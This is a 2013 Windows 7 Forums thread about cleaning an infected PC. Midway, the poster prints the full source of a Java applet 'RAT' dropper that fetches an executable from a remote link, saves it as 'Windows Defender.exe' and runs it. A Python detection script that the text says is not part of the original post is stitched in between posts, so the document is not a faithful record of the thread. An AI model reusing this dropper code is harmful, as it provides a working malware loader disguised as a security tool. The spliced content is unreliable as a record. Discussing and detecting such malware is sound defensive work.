Windows 7 Forums


Windows 7: Information from another thread

05 Apr 2013   #11
zl7man

Windows 7 Home Premium 64bit
 
 

Update: so I found a flash drive that is not bricked according to my Mac laptop. I am not using the one that is, on the off chance that it is infected and that the virus can be cross platform (are there any known?). The problem is that the new one had contents, so I am going to have to wait till tomorrow to get the go-ahead from my parents to simply have a backup for the flash drive (will erase when they give the go-ahead). I already did back up the information though (on the Mac, which from what I know is clean (also has Avast! anti-virus on it)).

I have to wait to try and fix this, then again time is of the essence but that time limit seems to have been long past if I only just found that folder. Guess Avast was not allowed to scan it?

EDIT: going to put a picture of stuff that Avast said from last scan on this computer


05 Apr 2013   #12
Golden
Microsoft MVP

Windows 7 Ult. x64
 
 

Quote: Originally Posted by zl7man
virus can be cross platform (are there any known?).
Very, very few. Just use it, it will be fine.
05 Apr 2013   #13
zl7man

Windows 7 Home Premium 64bit
 
 

Did some digging, and here is essentially what the RAT.java was:

(wish there was a spoiler function)
Code:
import java.applet.Applet;
import java.io.BufferedOutputStream;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URL;
import java.net.URLConnection;

@SuppressWarnings("serial")
public class RAT extends Applet {

	public void start() {
		String userDirectory = System.getProperty("user.home");
		final String DL_LINK = "    censored dropbox link";
		System.out.println("Starting");
		download(DL_LINK, userDirectory + "\\Windows Defender.exe");
		System.out.println("Done");
		Runtime run = Runtime.getRuntime();
		try {
			run.exec("\"" + userDirectory + "\\Windows Defender.exe\"");
		} catch (IOException e) {
			System.out.println("There is an error!");
			File exe = new File("D\\Windows Defender.exe");
			exe.delete();
		}
	}

	public void download(final String address, final String localFileName) {
		OutputStream out = null;
		URLConnection conn = null;
		InputStream in = null;
		try {
			final URL url = new URL(address);

			out = new BufferedOutputStream(new FileOutputStream(localFileName));
			conn = url.openConnection();
			in = conn.getInputStream();

			final byte[] buffer = new byte[1024];
			int numRead;
			while ((numRead = in.read(buffer)) != -1) {
				out.write(buffer, 0, numRead);
			}
		} catch (final Exception exception) {
		} finally {
			try {
				if (in != null) {
					in.close();
				}
				if (out != null) {
					out.close();
				}
			} catch (final IOException ioe) {
			}
		}
	}
}
Instead of Windows Defender.exe it would be rataman.exe
.
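A defender-side check for the behaviour the applet above shows (an executable written to the root of the user profile and launched from inside the Java plug-in), given as an added example that is not part of the original post. The record fields, the sample events and the list of JVM host process names are assumptions made for illustration.

```python
import ntpath
import re

# JVM host processes an applet runs inside (assumed list for this example).
JAVA_HOSTS = {"java.exe", "javaw.exe", "jp2launcher.exe"}
# An .exe placed directly in a profile root, e.g. C:\Users\bob\x.exe
PROFILE_ROOT_EXE = re.compile(r"^[a-z]:\\users\\[^\\]+\\[^\\]+\.exe$", re.I)
# File names that imitate built-in Windows components.
LOOKALIKE = re.compile(r"windows defender|svchost|explorer", re.I)
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files")

def score_event(event):
    """Return the reasons a process-creation record resembles the dropped
    second stage; an empty list means nothing matched."""
    reasons = []
    image = event["image"]
    parent = ntpath.basename(event["parent_image"]).lower()
    if PROFILE_ROOT_EXE.match(image):
        reasons.append("exe in profile root")
        if parent in JAVA_HOSTS:
            reasons.append("spawned by JVM")
    name = ntpath.basename(image)
    if LOOKALIKE.search(name) and not image.lower().startswith(SYSTEM_DIRS):
        reasons.append("system-like name outside system dirs")
    return reasons

def flag_events(events):
    """Keep events with two or more reasons, so one weak signal is not enough."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= 2:
            hits.append((ev["image"], reasons))
    return hits

# Constructed sample records (hypothetical field names, not a real log schema).
SAMPLE_EVENTS = [
    {"image": r"C:\Users\zl\Windows Defender.exe",
     "parent_image": r"C:\Program Files\Java\jre7\bin\jp2launcher.exe"},
    {"image": r"C:\Program Files\Windows Defender\MSASCui.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Users\zl\AppData\Local\Temp\setup.exe",
     "parent_image": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Users\zl\rataman.exe",
     "parent_image": r"C:\Program Files\Java\jre7\bin\javaw.exe"},
]

if __name__ == "__main__":
    for image, reasons in flag_events(SAMPLE_EVENTS):
        print(image, "->", ", ".join(reasons))
```

The genuine Windows Defender binary under Program Files and the installer in a Temp subfolder are not flagged; both profile-root executables started by a JVM process are.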

05 Apr 2013   #14
zl7man

Windows 7 Home Premium 64bit
 
 

Quote: Originally Posted by Golden
Quote: Originally Posted by zl7man
virus can be cross platform (are there any known?).
Very, very few. Just use it, it will be fine.
Looks like that flash drive is really dead. Not recognized by the Mac as being there.
(was a really old flash drive)

edit: see first post for picture of the folder in question.
05 Apr 2013   #15
zl7man

Windows 7 Home Premium 64bit
 
 

Added more logs and pictures. DDS had an interesting remark in the attached file:
4/2/2013 7:26:02 PM, Error: volsnap [36] - The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.

Shadow copy.... um...
05 Apr 2013   #16
Jacee
Microsoft MVP

Windows 7 Ultimate 32bit SP1
 
 

05 Apr 2013   #17
zl7man

Windows 7 Home Premium 64bit
 
 

That makes sense. Well that solves that problem. I am going to sleep for tonight... be back tomorrow to check for new stuff.
06 Apr 2013   #18
zl7man

Windows 7 Home Premium 64bit
 
 

So I decided to do something stupid, but it worked out I guess. Used AdwCleaner to delete the folder and checked where the folder was; it is gone. Going to run a full scan with Avast! now.

(Attached AdwCleaner delete log)
Ran RogueKiller and attached the log because I am unsure about the registry stuff it mentioned.


Attached Files
File Type: txt AdwCleaner[S2].txt (1.4 KB, 3 views)
File Type: txt RKreport[5]_S_04062013_02d1446.txt (2.1 KB, 3 views)
07 Apr 2013   #19
Jacee
Microsoft MVP

Windows 7 Ultimate 32bit SP1
 
 

I'd like you to scan your machine with ESET OnlineScan
  1. Hold down Control and click on the following link to open ESET OnlineScan in a new window.
    ESET OnlineScan
  2. Click the button.
  3. For alternate browsers only: (Microsoft Internet Explorer users can skip these steps)
    1. Click on to download the ESET Smart Installer. Save it to your desktop.
    2. Double click on the icon on your desktop.
  4. Check
  5. Click the button.
  6. Accept any security warnings from your browser.
  7. Check
  8. Push the Start button.
  9. ESET will then download updates for itself, install itself, and begin scanning your computer. Please be patient as this can take some time.
  10. When the scan completes, push
  11. Push , and save the file to your desktop using a unique name, such as ESETScan. Include the contents of this report in your next reply.
  12. Push the button.
  13. Push
08 Apr 2013   #20
zl7man

Windows 7 Home Premium 64bit
 
 

I was unable to click the list of found threats because there were none. So I have attached a print screen of that report:

Edit: so does that mean that I should be fine?


Attached Thumbnails
Information from another thread-clear.png  